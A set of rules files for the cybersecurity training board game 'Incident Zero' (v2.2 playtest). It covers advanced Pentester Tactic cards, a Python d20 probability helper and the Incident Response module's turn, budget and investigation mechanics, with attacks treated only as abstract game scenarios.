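Against PT-07 the resolver picks D-08 at +5, so the team needs a natural 9 or better (a 60% chance); had the team chosen D-04, which the card does not list, it would sit at +0 and need a natural 14 (35%). That gap is the practical meaning of "layering still matters": deploying broadly is what guarantees a strong printed bonus is on the table when a card is drawn.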
Each Pentester Tactic represents a real-world attack pattern that:
1. Is realistic - Based on actual TTPs (Tactics, Techniques, Procedures) from MITRE ATT&CK
2. Teaches defense priorities - Success requires defense-in-depth, not single solutions
3. Demonstrates gaps - Failing a tactic shows where the defense strategy is weak
4. Encourages layering - Multiple defenses together are stronger than any single defense
For advanced gameplay, 8 additional Pentester Tactics are available:
- PT-09: Multi-Vector Attack (combines multiple tactics)
- PT-10: Zero-Day Exploitation (signature-based defenses are useless)
- PT-11: Ransomware Deployment & Encryption (requires backup verification)
- PT-12: APT Campaign (multi-turn tactic with escalating difficulty)
- PT-13: Cloud Misconfiguration Attack (for cloud-native environments)
- PT-14: IoT/OT Compromise (for industrial environments)
- PT-15: Firmware/BIOS Attack (hardware-level persistence)
- PT-16: Container Escape (privilege escalation from containers)
See ../expansion-deck/advanced-tactics.md for these advanced cards.
Hardening Module: Pentester Tactic Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/hardening/expansion-deck/advanced-tactics.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Difficulty → DC mapping (v2.2): BASIC = DC 12, INTERMEDIATE = DC 13, ADVANCED = DC 14, EXPERT = DC 15, EXPERT+ = DC 16. The Outcome threshold on every card equals its printed DC. Resolution uses the canonical formula in Module: Hardening: d20 + printed bonus for ONE chosen defense + upgrades (+2 each) + playbook (+3) vs DC.
Advanced Pentester Tactic Cards extend the core Hardening module with 8 sophisticated attack scenarios for experienced players and complex threat environments.
Tactic Type: Advanced Persistence / Multi-Stage
Target Vectors: MALWARE, CREDENTIAL_ABUSE, NETWORK, DATA_EXFIL
Difficulty: ADVANCED (defeat DC 14)
Description: A pentester orchestrates a coordinated multi-vector attack that combines multiple tactics simultaneously: social engineering + malware + lateral movement + data exfiltration. Each phase is dependent on the previous one, and success in one area opens opportunities in others. Can your defenses coordinate to stop the full attack chain?
Attack Details:
- Phase 1: Phishing delivers initial malware
- Phase 2: Malware establishes persistence
- Phase 3: Lateral movement to file server
- Phase 4: Credential harvesting and exfiltration
- Targets: Defense coordination, integrated threat response
- Blue Team must roll separately for EACH phase
Defending Defenses (choose one listed defense per phase roll):
- Phase 1 (Social Engineering): D-02 (+2), D-23 (+2)
- Phase 2 (Malware): D-06 (+1), D-08 (+3), D-13 (+2), D-17 (+2)
- Phase 3 (Lateral Movement): D-04 (+1), D-09 (+3), D-10 (+2), D-15 (+2)
- Phase 4 (Data Exfil): D-11 (+4), D-22 (+2), D-24 (+1)
- Card Effect, Full Coverage: If Blue Team has deployed defenses covering all 4 targeted vectors, add +1 to each phase roll
Resolution (v2.2): Each phase is a separate roll against DC 14, with one chosen defense per roll (that phase's bonus list).
Outcome:
- Blue Team Succeeds (14+ on every phase roll): Comprehensive defense stops the attack chain
- Blue Team Fails ANY phase: Attack progresses; Blue Team loses 1d4 security score points per failed phase and must deploy emergency response
Teaching Point: Modern attacks are sophisticated and multi-faceted. No single defense can stop them. Comprehensive defense-in-depth with coordinated response is essential. Defense teams must practice responding to coordinated attacks.
Tactic Type: Initial Access / Execution
Target Vectors: MALWARE, WEB_EXPLOIT
Difficulty: EXPERT (defeat DC 15)
Description: A pentester exploits a previously unknown vulnerability (zero-day) in a critical business application. Traditional defenses (patching, signature-based detection, vulnerability scanning) cannot help because the vulnerability isn't public. Only behavioral detection or proactive hunting can identify this attack. Can your advanced monitoring catch what signature-based tools cannot?
Attack Details:
- Targets: Signature-based defenses, unknown vulnerability management
- Attack Vector: A fully patched application with no known vulnerabilities; the flaw is unknown to the vendor, so no patch or signature exists yet
- Success indicates: Blind spots in behavioral detection
- Blue Team rolls 1d20 to detect before exploitation succeeds
Defending Defenses:
- D-03 (Patching): +0 bonus (a zero-day by definition has no patch)
- D-06 (Antivirus): +0 bonus (signatures don't exist for a zero-day)
- D-08 (EDR): +3 bonus (behavioral analytics detect anomalous post-exploitation activity)
- D-13 (Threat Hunting): +3 bonus (proactive hunting finds zero-day activity)
- D-17 (Sandbox): +2 bonus (detonates malicious payloads in a sandbox before deployment)
- D-18 (IPS): +1 bonus only (cannot stop unknown exploits)
- D-21 (Container Security): +2 bonus (isolates the exploited application)
Outcome:
- Blue Team Succeeds (15+): EDR or threat hunting detects post-exploitation activity before damage
- Blue Team Fails: Zero-day achieves initial access; Blue Team suffers -1 penalty to all rolls for the remainder of the game (blind spot in defenses)
Special Rule: If Blue Team has NOT deployed at least 2 of {D-08, D-13, D-17}, they cannot succeed at this challenge, whatever they roll: you must have behavioral detection to stop unknown exploits.
Teaching Point: Signature-based defenses have inherent limitations. Behavioral detection and threat hunting are essential for detecting novel attacks. Zero-day preparedness requires assumption-of-breach mindset.
Tactic Type: Impact / Extortion
Target Vectors: MALWARE, DATA_EXFIL, NETWORK
Difficulty: EXPERT (defeat DC 15)
Description: A pentester deploys ransomware that encrypts critical business data and demands payment for decryption keys. The attack combines malware execution, persistence, and data exfiltration (to threaten public disclosure if ransom not paid). This is the culmination of a successful attack chain. Can your defenses prevent data encryption, and can your backup strategy save you?
Attack Details:
- Targets: Data availability, backup resilience, recovery procedures
- Success indicates: Lack of backup redundancy or immutable backup protection
- Blue Team rolls 1d20 to either: (A) prevent ransomware deployment, OR (B) recover from backup
Defending Defenses:
- Option A: Prevent Deployment
- D-08 (EDR): +3 bonus (detects ransomware execution)
- D-13 (Threat Hunting): +2 bonus (proactive hunting finds ransomware)
- D-14 (Memory Forensics): +1 bonus (detects encryption process)
- D-17 (Sandbox): +2 bonus (detonates before reaching production)
- D-21 (Container Security): +2 bonus (prevents spread in containerized environments)
Outcome:
- Blue Team Succeeds (15+ on the prevention roll, or 12+ on the recovery roll under Option B): Ransomware prevented or successfully recovered from backup
- Blue Team Fails: Data encrypted; immediate loss of 25% of remaining Budget, and all data-dependent operations suffer -2 penalty for the remainder of the game
Special Rule - Immutable Backup Check: If Blue Team deployed D-19, they also need verification that backups are immutable and tested. If backup testing procedures weren't mentioned in D-19 deployment, the bonus only applies if they roll 15+.
Teaching Point: Ransomware is one of the most damaging threats organizations face. Prevention through detection matters, but backup resilience is the last line of defense for availability: immutable or offline backups that survive the attack, plus regular restore testing, are essential business continuity strategy. Note the card's exfiltration component: a restore brings the data back, but it does not undo the theft behind the disclosure threat, so the exfiltration still has to be detected and stopped.
Tactic Type: Advanced Persistent Threat / Long-term Compromise
Target Vectors: CREDENTIAL_ABUSE, MALWARE, NETWORK, DATA_EXFIL
Difficulty: EXPERT+ (defeat DC 16)
Description: A pentester simulates an Advanced Persistent Threat (APT) campaign that maintains presence across multiple turns. Each turn, the APT performs new reconnaissance, persistence, lateral movement, or data exfiltration activities. The Blue Team must detect and eradicate the APT before it achieves critical objectives. This is a multi-turn challenge that escalates difficulty.
Attack Details:
- Multi-turn challenge (lasts 2-3 turns of the main game)
- Targets: Long-term detection, threat hunting, incident response procedures
- Each turn the APT performs an action; Blue Team must detect and respond
- If the APT achieves 3 objectives (e.g., 3 successful data exfils), the game is lost
Turn-by-Turn APT Actions:
- Turn 1: Reconnaissance (scan network, enumerate users, identify critical assets)
- Turn 2: Lateral movement (move to file server, domain controller)
- Turn 3: Persistence establishment (add backdoor, create hidden user account)
- Turn 4 (if still active): Data exfiltration (steal customer database)
- Turn 5+ (if still active): Destruction phase (delete logs, trigger ransomware)
Defending Against APT:
Each turn, Blue Team must roll 1d20 to detect the APT activity:
D-24 (Threat Intelligence): +2 bonus (known APT indicators in threat feeds)
Eradication Phase (if detected):
Outcome:
- Blue Team Succeeds (roll ≥ current DC, base 16): APT detected and eradicated before achieving 3 objectives
- Blue Team Fails (roll < current DC): APT progresses to its next action; if 3 objectives are achieved, the game is lost
Special Rule - Escalating Difficulty: Each turn the APT remains undetected, DC increases by 1 (Turn 1: DC 16, Turn 2: DC 17, Turn 3: DC 18, etc.)
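The same d20 arithmetic carried across several rolls, as an added example that is not part of the Incident Zero rules files. It covers the two compounding cases in this deck: PT-12 above, where the DC rises by 1 for every turn the APT stays undetected, and PT-09, where every phase roll must succeed. The modifiers passed in are the Blue Team's total modifier for the chosen defense on each roll (printed bonus plus upgrades and playbook). Which defenses the sample Blue Team has deployed, and the absence of a natural-1/20 rule, are assumptions of the example.

```python
def d20_success(dc, modifier):
    """Probability that d20 + modifier >= dc (assumption: no natural-1/20 rule; the cards define none)."""
    return max(0, min(20, 21 - (dc - modifier))) / 20


def apt_detection_curve(modifier, turns=3, base_dc=16, escalation=1):
    """PT-12: per-turn and cumulative odds of detecting the APT when the DC climbs by `escalation`
    for every turn it has gone undetected (Turn 1: DC 16, Turn 2: DC 17, Turn 3: DC 18, ...)."""
    curve = []
    still_hidden = 1.0
    for t in range(turns):
        dc = base_dc + escalation * t
        p = d20_success(dc, modifier)
        still_hidden *= 1 - p                      # APT survives this turn only if the roll fails
        curve.append({"turn": t + 1, "dc": dc, "p_this_turn": p, "p_detected_by_now": 1 - still_hidden})
    return curve


def turns_to_even_odds(modifier, base_dc=16, escalation=1, max_turns=10):
    """Turns needed before cumulative detection reaches 50% against PT-12, or None if it never does."""
    for t in range(1, max_turns + 1):
        curve = apt_detection_curve(modifier, turns=t, base_dc=base_dc, escalation=escalation)
        if curve[-1]["p_detected_by_now"] >= 0.5:
            return t
    return None


def all_phases_probability(dc, modifiers):
    """PT-09: the attack chain is stopped only if EVERY phase roll succeeds, so the per-phase odds multiply."""
    p = 1.0
    for m in modifiers:
        p *= d20_success(dc, m)
    return p


if __name__ == "__main__":
    # Constructed Blue Team for PT-12: D-24 only (+2 printed), no upgrades, no playbook.
    for row in apt_detection_curve(modifier=2):
        print(row)                                  # 35% / 30% / 25% per turn; about 66% cumulative by turn 3
    print(turns_to_even_odds(2))                    # 2
    # PT-09 with the strongest listed defense chosen for each phase: D-02 +2, D-08 +3, D-09 +3, D-11 +4.
    print(all_phases_probability(14, [2, 3, 3, 4]))  # 0.061875 (about 6%)
    print(all_phases_probability(14, [3, 4, 4, 5]))  # 0.09075 with the Full Coverage +1 on every phase
```

Two things the numbers make plain. For PT-12, each undetected turn is worth more than the 1-point DC bump suggests, because the per-turn odds shrink while the attacker keeps banking objectives; with only threat intel deployed the team does not reach a coin flip until turn 2. For PT-09, even a table with the best printed bonus for all four phases stops the full chain roughly one time in sixteen, which is why the card's Teaching Point insists on hardening upgrades and playbooks rather than on any single strong defense.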
Teaching Point: APTs are sophisticated, well-resourced, and patient. They expect to remain undetected for months or years. Early detection is critical. Continuous monitoring, threat intelligence integration, and advanced hunting are essential for APT detection.
Tactic Type: Cloud Security / Privilege Escalation
Target Vectors: MALWARE, CREDENTIAL_ABUSE, NETWORK, DATA_EXFIL
Difficulty: ADVANCED (defeat DC 14)
Description: A pentester discovers misconfigured cloud resources (S3 bucket, Azure storage, GCP database) that are accessible without authentication. They pivot from a compromised workstation to cloud infrastructure, exfiltrating sensitive data stored in the cloud. Can your cloud security controls catch this lateral movement into the cloud?
Attack Details:
- Targets: Cloud security posture management, identity & access management in the cloud
- Assumes: Blue Team has cloud infrastructure in their network design
- Success indicates: Misconfigured cloud resources, weak cloud IAM policies
- Blue Team rolls 1d20 to detect and remediate
Defending Defenses:
- D-04 (Firewall Rules): +1 bonus (limits cloud connectivity from compromised systems)
- D-20 (Zero Trust Access): +2 bonus (requires proper identity & authorization for cloud access)
- D-21 (Container Security): +2 bonus (blocks cloud API abuse if containerized)
- D-22 (SIEM Enterprise): +2 bonus (detects unusual cloud API calls)
- D-24 (Threat Intelligence): +1 bonus (known indicators of exposed or abused cloud storage)
- New Special Defense - Cloud Posture Mgmt: +3 bonus (automatically detects and remediates misconfigurations)
Special Cloud Defense: If Blue Team deployed cloud-specific hardening (e.g., cloud security posture management tools, cloud-native IAM), add +2 bonus.
Outcome:
- Blue Team Succeeds (14+): Misconfiguration detected and remediated before exfiltration
- Blue Team Fails: Cloud data is exfiltrated; -1 penalty to all rolls for the remainder of the game, plus an immediate 15 Budget cost for cloud forensics
Teaching Point: Cloud security is fundamentally different from on-premises. The shared responsibility model leaves configuration and identity in the customer's hands, so organizations must actively manage them. Misconfiguration is among the most common causes of cloud data exposure. Continuous posture scanning is essential.
Tactic Type: Operational Technology Attack / Physical Safety Impact
Target Vectors: NETWORK, MALWARE
Difficulty: ADVANCED (defeat DC 14)
Description: A pentester compromises IoT or Operational Technology (OT) devices (industrial control systems, HVAC, building management, manufacturing systems) that are connected to the corporate network. Unlike IT systems (computers, servers), OT systems prioritize availability and cannot be patched frequently. Can your network architecture prevent OT compromise, and can you detect it before physical systems are affected?
Attack Details:
- Targets: Network segmentation between IT and OT, OT-specific monitoring
- Assumes: Blue Team has IoT/OT devices in their network design
- Success indicates: Lack of network segmentation or OT-specific monitoring
- Blue Team rolls 1d20 to detect and isolate
Defending Defenses:
- D-04 (Firewall Rules): +1 bonus (separates IT from OT traffic)
- D-09 (Network Segmentation): +3 bonus (dedicated OT segment with restricted access)
- D-10 (SIEM Correlation): +1 bonus (detects OT anomalies if properly tuned)
- D-22 (SIEM Enterprise): +2 bonus (advanced OT monitoring and correlation)
- New Special Defense - OT Monitoring: +3 bonus (specialized tools detect OT compromise)
Special OT Defense: If Blue Team has deployed OT-specific monitoring and segmentation, add +2 bonus.
Outcome:
- Blue Team Succeeds (14+): OT compromise detected and isolated before impact
- Blue Team Fails: OT systems compromised; physical operations affected, -2 penalty to all rolls for the remainder of the game, plus potential safety/liability consequences (narrative impact)
Teaching Point: OT security is distinct from IT security. OT systems cannot be patched like IT systems. Network segmentation is the primary defense. OT-specific monitoring and threat hunting are essential. Organizations with manufacturing, utilities, or building management need specialized OT security strategies.
Tactic Type: Persistence / Hardware-Level Attack
Target Vectors: MALWARE, NETWORK
Difficulty: EXPERT (defeat DC 15)
Description: A pentester with physical or remote access targets system firmware (BIOS/UEFI) or the bootloader, establishing persistence at the hardware level below the operating system. This attack survives OS reinstalls and disk replacement, and if the tampered firmware arrives through the supply chain it can even follow an organization across a hardware refresh. Can your controls detect and prevent firmware-level attacks?
Attack Details:
- Targets: Firmware integrity, secure boot verification, hardware attestation
- Success indicates: Lack of UEFI Secure Boot, no firmware validation, no TPM
- Blue Team rolls 1d20 to detect firmware tampering
Defending Defenses:
- D-16 (Credential Guard & Secure Boot): +3 bonus (UEFI Secure Boot refuses unsigned bootloaders and drivers; note that it does not verify the platform firmware image itself, which is what measured boot and attestation cover)
- D-17 (Malware Sandbox): +1 bonus only (doesn't catch firmware-level attacks)
- D-13 (Threat Hunting): +2 bonus (advanced hunting detects firmware persistence)
- New Special Defense - Hardware Attestation: +3 bonus (TPM measurements of the boot chain reveal firmware changes)
- New Special Defense - Supply Chain Verification: +2 bonus (validates firmware integrity from a trusted source)
Special Firmware Defense: If Blue Team deployed secure boot, TPM attestation, and hardware validation, add +2 additional bonus.
Outcome:
- Blue Team Succeeds (15+): Firmware tampering detected and system reimaged
- Blue Team Fails: Firmware-level persistence established; -2 penalty to all rolls for the remainder of the game, and Blue Team loses control of the compromised system
Teaching Point: Firmware attacks are extremely sophisticated but increasingly common in APT campaigns. Secure Boot and TPM are standard defenses but must be enabled and properly configured. Firmware supply chain security is critical. Organizations should consider firmware integrity verification in procurement.
Tactic Type: Privilege Escalation / Container Escape
Target Vectors: MALWARE, NETWORK
Difficulty: EXPERT (defeat DC 15)
Description: A pentester, operating from within a compromised container, exploits a container runtime vulnerability (like CVE-2019-5736 runc exploit) to escape the container and gain access to the underlying host system. From there, lateral movement to other containers and host systems becomes possible. Can your container security and patching strategies prevent container escape?
Attack Details:
- Targets: Container runtime patching, container isolation, runtime security
- Assumes: Blue Team has containerized workloads (Docker, Kubernetes, etc.)
- Success indicates: Unpatched container runtime or lack of runtime monitoring
- Blue Team rolls 1d20 to prevent or detect escape
Defending Defenses:
- D-03 (Patching): +2 bonus (ensures the container runtime is patched)
- D-08 (EDR): +2 bonus (detects suspicious syscalls attempting escape)
- D-13 (Threat Hunting): +2 bonus (hunting for container escape indicators)
- D-21 (Container Security): +4 bonus (runtime security detects and blocks escape attempts)
- New Special Defense - Kubernetes Security Policies: +2 bonus (network policies and pod security controls restrict escape; note that PodSecurityPolicy was removed in Kubernetes 1.25, so on current clusters this means Pod Security Admission or an admission controller enforcing the Pod Security Standards)
Special Container Defense: If Blue Team has deployed comprehensive container security (runtime monitoring + pod security policies + network policies), add +2 additional bonus.
Outcome:
- Blue Team Succeeds (15+): Container escape prevented or detected before host compromise
- Blue Team Fails: Attacker escapes the container to the host; every subsequent attack gains +1 (treat as +1 to the DC of each later tactic) and the attacker gains the ability to compromise other containers
Teaching Point: Container security is distinct from traditional OS security. Container runtimes have historically had significant vulnerabilities. Runtime security monitoring is essential. Kubernetes network policies and pod security standards are critical controls. Organizations using containers must keep runtimes patched and actively monitor for escape attempts.
| Card | Tactic | Vectors | Difficulty | Primary Defense |
|---|---|---|---|---|
| PT-09 | Multi-Vector Attack | Multiple | ADVANCED (DC 14) | Integrated Response |
| PT-10 | Zero-Day Exploitation | MALWARE, WEB | EXPERT (DC 15) | Behavioral Detection |
| PT-11 | Ransomware Deployment | MALWARE, EXFIL, NETWORK | EXPERT (DC 15) | Backup & DR |
| PT-12 | APT Campaign | Multiple | EXPERT+ (DC 16) | Threat Hunting |
| PT-13 | Cloud Misconfiguration | Multiple | ADVANCED (DC 14) | Cloud Posture |
| PT-14 | IoT/OT Compromise | NETWORK, MALWARE | ADVANCED (DC 14) | OT Segmentation |
| PT-15 | Firmware Attack | MALWARE, NETWORK | EXPERT (DC 15) | Hardware Attestation |
| PT-16 | Container Escape | MALWARE, NETWORK | EXPERT (DC 15) | Runtime Security |
Scenario A: Cloud-Native Hardening (6 turns)
- Turns 1-3: Deploy cloud-specific defenses + container security
- Turn 4: PT-13 (Cloud Misconfiguration) challenge
- Turn 5: PT-16 (Container Escape) challenge
- Turn 6: Final defense evaluation
Scenario B: APT Defense (8 turns)
- Turns 1-4: Deploy enterprise-grade defenses (SIEM, threat hunting, forensics)
- Turns 5-7: PT-12 (APT Campaign) multi-turn challenge
- Turn 8: Eradication and recovery
Scenario C: Zero-Day & Ransomware (7 turns)
- Turns 1-3: Deploy behavioral detection + backup systems
- Turn 4: PT-10 (Zero-Day) challenge
- Turn 5: PT-11 (Ransomware) challenge
- Turns 6-7: Recovery and hardening improvements
Each Advanced Tactic represents modern, sophisticated threat scenarios that:
Advanced tactics can be introduced gradually:
- Start with PT-09 (Multi-Vector) and PT-10 (Zero-Day)
- Once mastered, add PT-11 (Ransomware) and PT-13 (Cloud)
- Save PT-12 (APT), PT-14 (OT), PT-15 (Firmware), PT-16 (Container) for expert play
Advanced tactics build on concepts from core tactics:
- PT-09 (Multi-Vector) combines concepts from PT-01 to PT-08
- PT-10 (Zero-Day) extends PT-05 (Priv Esc) concepts
- PT-12 (APT) extends PT-02 (Malware Evasion) concepts
Possible additional advanced tactics:
- PT-17: Machine Learning Model Poisoning
- PT-18: Quantum Cryptanalysis (a quantum-capable attacker breaking cryptography that is not quantum-resistant)
- PT-19: Supply Chain Compromise (Deep Dive)
- PT-20: Geopolitical Nation-State Attack Simulation
Hardening Module: Advanced Pentester Tactics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
docs/rules/module-incident-response.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
The Incident Response Module is the foundation of Incident Zero. Players act as a security operations center (SOC) team responding to an active cyberattack. The core challenge: reveal a hidden attack chain before time runs out or budget is exhausted.
This module teaches:
- Primary: Cyber kill chain understanding, threat detection, evidence gathering
- Secondary: Resource prioritization, incident response under pressure, forensic investigation
Key Mechanics:
- Hidden attack chain (3-5 Threat Cards) is pre-built by the Threat Orchestrator
- Blue Team reveals cards by successful investigation (two successes on the same chain link, v2.2) or by deploying a vector+step-matching defense
- Uncontained Threats Penalty creates urgency: revealed threats cost 5 Budget per turn until contained
- Active Breach Cost (v2.2): while any chain card remains hidden, the breach itself costs 5 Budget per turn (dwell time is never free)
- Emergency Response action provides a way to contain uncontained threats (15 Budget, v2.2)
Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.
| Difficulty | Chain Length | Starting Budget | Turn Limit | Best For |
|---|---|---|---|---|
| Beginner | 3 cards | 100 | 7 turns | First playthrough, basic learning |
| Intermediate | 4 cards | 100 | 9 turns | Standard play, mixed experience |
| Advanced | 5 cards | 100 | 11 turns | Experienced players, challenge |
Scaling Notes:
- Beginner: ~30 min session, teaches the full kill chain at a comfortable pace
- Intermediate: ~40 min session, requires a focused investigation strategy
- Advanced: ~45 min session, demands efficient resource allocation and quick thinking
- Advanced Threat Orchestrators can instead use the Tier + d4 system in Core Rules §3a
Create the Hidden Attack Chain:
1. Select 3-5 Threat Cards from the deck
2. Arrange them in logical attack chain sequence:
- First card: INITIAL COMPROMISE
- Middle cards: PIVOT & ESCALATE, PERSISTENCE
- Final card: C2 & EXFIL
3. Write down clues for each hidden card on separate paper (keep hidden from Blue Team)
4. Place relevant Asset Cards on the table (visible to all—provides scenario context). Asset Cards are shared components: see cards/network-building/core-deck/asset-cards.md
Attack Chain Strategy Tips:
- Start simple (Beginner): Phishing → Lateral Movement → Database Exfil
- Intermediate: Phishing → Credential Dumping → VPN Access → Persistence → C2 Beaconing
- Advanced: Web Exploit → Lateral Movement → Privilege Escalation → Data Staging → Exfiltration
Recommended First-Time Scenario (3 cards, 30 minutes):
1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING)
2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)
Initialize trackers and materials:
| Item | Starting Value |
|---|---|
| Turn Tracker | 1 |
| Budget Tracker | 100 |
| Uncontained Threats Tracker | 0 |
| Defense Cards | Draw 5 (face down) |
Threat Orchestrator delivers opening narrative using only the first hidden card's clue. Example:
"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets.
You have limited time and budget to investigate before the attacker escalates. What do you do?"
Each turn represents approximately 2-4 hours of incident response operations.
COMPLETE TURN SEQUENCE:
1. START OF TURN
- Apply Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget from the tracker
- Apply Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (the hidden breach is doing damage while you can't see it)
- Announce current turn number and budget remaining
- Example: "Turn 3. Start-of-turn costs: 5 for your uncontained threat, plus 5 Active Breach Cost; the chain isn't fully mapped yet. Budget drops from 85 to 75."
2. BLUE TEAM'S TURN (2-3 minutes discussion)
- Team discusses incident response strategy
- Decides on ONE action to take this turn (Investigate, Deploy Defense, or Emergency Response)
- Team member announces the action and its parameters (what they're investigating, which defense they're deploying, etc.)
3. ACTION RESOLUTION
- Perform the chosen action (see the three actions below)
- Roll 1d20 if the action requires a roll
- Apply modifiers (see modifier rules in core-rules.md)
- Resolve the outcome immediately
4. END OF TURN
- Advance Turn Tracker by 1
- Draw 1 new Defense Card (add to hand)
- Check if the game has been won or lost (see victory/defeat conditions below)
- If still playing, return to START OF TURN
The attack chain is discovered in order: only the earliest unrevealed chain card can be investigated toward or revealed. Clues, investigation successes, and Deploy Defense reveals all target that card until it is face-up, then attention shifts to the next link. This matches how the clue system walks the kill chain.
Deployed defenses stay on the table and keep working. Whenever the chain link currently being targeted has an Attack Vector matching a deployed defense's Countermeasure Vector, add +2 to Investigate and Deploy Defense rolls against that link. The Threat Orchestrator (who knows the hidden vector) announces when this bonus applies—hearing "your deployed defenses are helping here" is itself a useful clue. This rule is stated once here; other sections simply refer to it.
Cost: 5 Budget per action
Roll Required: roll + modifiers ≥ 11 on d20
Special Rule: Modifiers apply and can stack
How It Works:
Roll Modifiers:
| Bonus | When Awarded | Examples |
|---|---|---|
| +2 | Strong technical justification | "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds. This helps us understand the initial compromise vector." |
| +1 | Real security tools/techniques referenced | "We'll query our SIEM for scheduled task creation events" or "We're checking for Mimikatz usage in memory" |
| +2 | Deployed Defense Persistence (v2.2) | A deployed defense's vector matches the targeted chain link (see rule above) |
| +0 | Vague investigation | "We want to find suspicious activity" |
Success (roll + modifiers ≥ 11); investigation successes accumulate (v2.2):
- First success against a chain link: TO provides a verbal clue about that card (the earliest unrevealed card in the chain)
- Second success against the same chain link: THE CARD IS REVEALED! Place it face-up; it becomes uncontained (add 1 to the Uncontained Threats Tracker) and the team chooses a Discovery Reward
- Clues should be dramatic and progressive: give more detail with each successful investigation
- Budget is spent (5 is deducted)
Failure (roll + modifiers < 11):
- "Your investigation yields no actionable intelligence at this time"
- Budget is spent anyway (5 is deducted)
- Team learns nothing but time advances
- Failure is realistic; not every investigation uncovers information
- Failures do NOT count toward the two accumulated successes
Strategic Consideration:
- Cheap action (only 5 Budget)
- Moderate success chance (need 11+ on d20, so exactly 50% without bonuses)
- Two successful investigations reveal a card without needing the right Defense Card in hand (v2.2)
- Deploy Defense (full match) is faster, one successful roll, but costs more and needs the right card
Cost: 10/15/25 Budget (depending on Defense Card tier: BASIC/ADVANCED/ELITE)
Roll Required: roll + modifiers ≥ 11 on d20
Special Rule: Modifiers apply; matching the defense to the threat reveals cards immediately
How It Works:
Roll Modifiers: Same as Investigate action (+2 for justification, +1 for tools, +2 Deployed Defense Persistence if applicable)
Success (roll + modifiers ≥ 11):
Check if the Defense Card matches the earliest unrevealed hidden threat (sequential discovery):
- FULL MATCH: Defense Countermeasure Vector matches the threat's Attack Vector AND it is the correct step in the chain
- THREAT CARD IS REVEALED IMMEDIATELY! The Threat card is placed face-up on the table. Blue Team learns what they've been fighting.
- Threat card is now "uncontained" (add 1 to the Uncontained Threats Tracker)
- Defense Card leaves your hand and stays on the table as a deployed defense; Budget is spent
- Defense remains active (Deployed Defense Persistence, v2.2): it grants +2 to future rolls against any chain link matching its vector
NO MATCH: Defense doesn't address current threat
Failure (roll + modifiers < 11): - Defense fails to deploy properly - Budget is spent anyway - Card is discarded - No progress made, but team learns from failure
Key Point: Even "unsuccessful" Defense deployments can be strategically valuable. Deployed defenses stay in play and grant +2 to rolls against later threats that match their vector (v2.2).
Strategic Consideration: - Expensive action (10-25 Budget, scales with defense tier) - Moderate success chance (same 11+ threshold as Investigate) - Two potential rewards: Defense deployment AND card reveal - High-risk/high-reward compared to Investigate
Example Scenario:
Hidden attack chain: Phishing → Lateral Movement → Database Exfil
Team believes phishing is happening (first card).
They deploy D-01 "Email Authentication Setup" (BASIC, 10 Budget).
Email Authentication addresses SOCIAL ENGINEERING vector.
Roll: 8 + 2 (strong justification) = 10 = FAIL
Email deployment fails, 10 Budget spent, card discarded.
Next turn: Same team deploys D-02 "User Security Training" (BASIC, 10 Budget).
Roll: 13 + 1 = 14 = SUCCESS
Defense addresses SOCIAL ENGINEERING vector and is INITIAL COMPROMISE step.
PHISHING CAMPAIGN REVEALED! Threat card placed face-up.
Uncontained Threats increases to 1 (now costing 5 Budget per turn).
Cost: 15 Budget (v2.2 — repriced from 25; flat cost)
Roll Required: None—this always succeeds
Special Rule: Only works on previously revealed threats
How It Works:
Strategic Use Cases:
Example Timeline (one action per turn):
Turn 3: Deploy Defense succeeds → PHISHING revealed → Uncontained Threats = 1
Turn 4: START → Deduct 5 (uncontained) + 5 (Active Breach Cost, 2 cards still hidden)
ACTION → Emergency Response on Phishing: pay 15 Budget
→ Phishing removed from play, Uncontained Threats = 0
Turn 5: START → Deduct only 5 (Active Breach Cost; no uncontained threats)
These are the core urgency mechanics of Incident Response. Dwell time costs money—whether you can see the threat or not.
Step 1: Threat Revealed
- When a Threat Card is successfully revealed (by two investigation successes or a full-match defense deployment)
- Add 1 to the Uncontained Threats Tracker
- This threat is now "active" and dangerous

Step 2: Penalty Applied at Turn Start
- At the START of every turn, deduct 5 Budget per uncontained threat
- Example: 2 uncontained threats = 10 Budget penalty each turn
- This creates continuous pressure—you MUST contain threats or lose resources

Step 3: Auto-Mitigation
- When the next card in the attack chain is revealed, the previous uncontained threat is automatically "contained" (represents shift of attention to new priority)
- Uncontained Threats Tracker decreases by 1
- Penalties decrease immediately

Step 4: Emergency Response Containment
- Team can use Emergency Response action to immediately remove a threat from the board
- Cost: 15 Budget (v2.2)
- Uncontained Threats Tracker decreases by 1
SETUP: 3-card chain (Phishing → Lateral Movement → Database Exfil)
Budget 100, Turn Limit 7 [(3 × 2) + 1]
Turn 1: START → Active Breach Cost -5 (95). No uncontained threats.
INVESTIGATE email headers (-5, 90). Roll succeeds.
→ 1st success vs. link 1: clue about the phishing campaign.
Turn 2: START → Active Breach Cost -5 (85).
INVESTIGATE mail gateway logs (-5, 80). Roll succeeds.
→ 2nd success vs. link 1: ✓ PHISHING CAMPAIGN REVEALED (investigation reveal, v2.2)
Uncontained Threats = 1. Reward: Budget Grant +10 (90).
Turn 3: START → -5 (uncontained) -5 (Active Breach) = 80.
INVESTIGATE network logs (-5, 75). Roll succeeds.
→ 1st success vs. link 2: clue about SMB lateral movement.
Turn 4: START → -5 (uncontained) -5 (Active Breach) = 65.
DEPLOY D-09 Network Segmentation (ADVANCED, -15, 50). Roll succeeds.
FULL MATCH (NETWORK vector, PIVOT & ESCALATE step)
→ ✓ LATERAL MOVEMENT REVEALED immediately (deploy reveal)
Phishing auto-mitigates; Lateral Movement now uncontained (still 1 total).
Reward: Budget Grant +10 (60).
Turn 5: START → -10 (50).
INVESTIGATE database access logs (-5, 45). Roll fails. No progress.
Turn 6: START → -10 (35).
